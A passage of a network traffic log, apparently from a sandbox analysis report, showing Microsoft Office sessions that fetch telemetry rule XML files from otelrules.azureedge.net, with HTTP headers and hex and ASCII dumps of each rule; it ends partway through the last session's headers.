                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                  Session IDSource IPSource PortDestination IPDestination Port
                  41192.168.2.44979013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:07 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:07 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:07 GMT
                  Content-Type: text/xml
                  Content-Length: 423
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                  ETag: "0x8DC582BB7564CE8"
                  x-ms-request-id: efc778c0-f01e-0052-4de5-219224000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044807Z-16849878b78dsttbr1qw36rxs800000005u0000000003snk
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:07 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                  Session IDSource IPSource PortDestination IPDestination Port
                  42192.168.2.44978813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:07 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:07 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:07 GMT
                  Content-Type: text/xml
                  Content-Length: 427
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                  ETag: "0x8DC582BA909FA21"
                  x-ms-request-id: e3c75742-001e-0014-79f3-245151000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044807Z-r197bdfb6b429k2s6br3k49qn400000002r000000000qezd
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:07 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                  Session IDSource IPSource PortDestination IPDestination Port
                  43192.168.2.44978913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:07 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:07 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:07 GMT
                  Content-Type: text/xml
                  Content-Length: 486
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                  ETag: "0x8DC582B92FCB436"
                  x-ms-request-id: 27632888-301e-0096-61d8-21e71d000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044807Z-16849878b782h9tt5z2wa5rfxg00000005hg00000000rdrb
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:07 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  44192.168.2.44979113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:08 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:09 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:08 GMT
                  Content-Type: text/xml
                  Content-Length: 478
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                  ETag: "0x8DC582B9B233827"
                  x-ms-request-id: 25f4145c-101e-005a-559b-24882b000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044808Z-15b8d89586fs9clcebkvq6f0sc0000000c80000000006kkk
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:09 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  45192.168.2.44979213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:08 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:09 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:08 GMT
                  Content-Type: text/xml
                  Content-Length: 404
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                  ETag: "0x8DC582B95C61A3C"
                  x-ms-request-id: 2d861f62-501e-0064-3bf5-241f54000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044808Z-15b8d89586f4zwgbz365q03b0c0000000cb000000000fa0s
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:09 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                  Session IDSource IPSource PortDestination IPDestination Port
                  46192.168.2.44979313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:08 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:09 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:08 GMT
                  Content-Type: text/xml
                  Content-Length: 468
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                  ETag: "0x8DC582BB046B576"
                  x-ms-request-id: be98e2c6-601e-0001-2b87-21faeb000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044808Z-16849878b78k46f8kzwxznephs00000005n0000000008smr
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:09 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  47192.168.2.44979413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:08 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:09 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:08 GMT
                  Content-Type: text/xml
                  Content-Length: 400
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                  ETag: "0x8DC582BB2D62837"
                  x-ms-request-id: 0aef0b24-901e-002a-631c-247a27000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044808Z-r197bdfb6b49k6rsrbz098tg8000000002tg00000000h0ge
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:09 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                  Session IDSource IPSource PortDestination IPDestination Port
                  48192.168.2.44979513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:08 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:09 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:08 GMT
                  Content-Type: text/xml
                  Content-Length: 479
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                  ETag: "0x8DC582BB7D702D0"
                  x-ms-request-id: 44f017bc-601e-000d-6df3-242618000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044808Z-15b8d89586fst84k5f3z220tec0000000cb00000000040hx
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:09 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  49192.168.2.44979813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:10 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:10 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:10 GMT
                  Content-Type: text/xml
                  Content-Length: 475
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                  ETag: "0x8DC582BB2BE84FD"
                  x-ms-request-id: 71363f0e-d01e-0065-7af4-24b77a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044810Z-r197bdfb6b4cz6xrsdncwtgzd40000000m5g000000007rk9
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:10 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  50192.168.2.44980113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:10 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:10 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:10 GMT
                  Content-Type: text/xml
                  Content-Length: 416
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                  ETag: "0x8DC582BAEA4B445"
                  x-ms-request-id: 6a28e11d-901e-0029-65f3-24274a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044810Z-r197bdfb6b4t7wszdvrfk02ah400000007a0000000003v4s
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:10 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                  Session IDSource IPSource PortDestination IPDestination Port
                  51192.168.2.44980013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:10 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:10 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:10 GMT
                  Content-Type: text/xml
                  Content-Length: 491
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                  ETag: "0x8DC582B98B88612"
                  x-ms-request-id: d4d27aa7-601e-0002-1812-22a786000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044810Z-16849878b78p6ttkmyustyrk8s00000005m000000000bs45
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:10 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  52192.168.2.44979913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:10 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:10 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:10 GMT
                  Content-Type: text/xml
                  Content-Length: 448
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                  ETag: "0x8DC582BB389F49B"
                  x-ms-request-id: 80264404-901e-002a-13ad-247a27000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044810Z-15b8d89586fcvr6p5956n5d0rc00000002v0000000002zpm
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
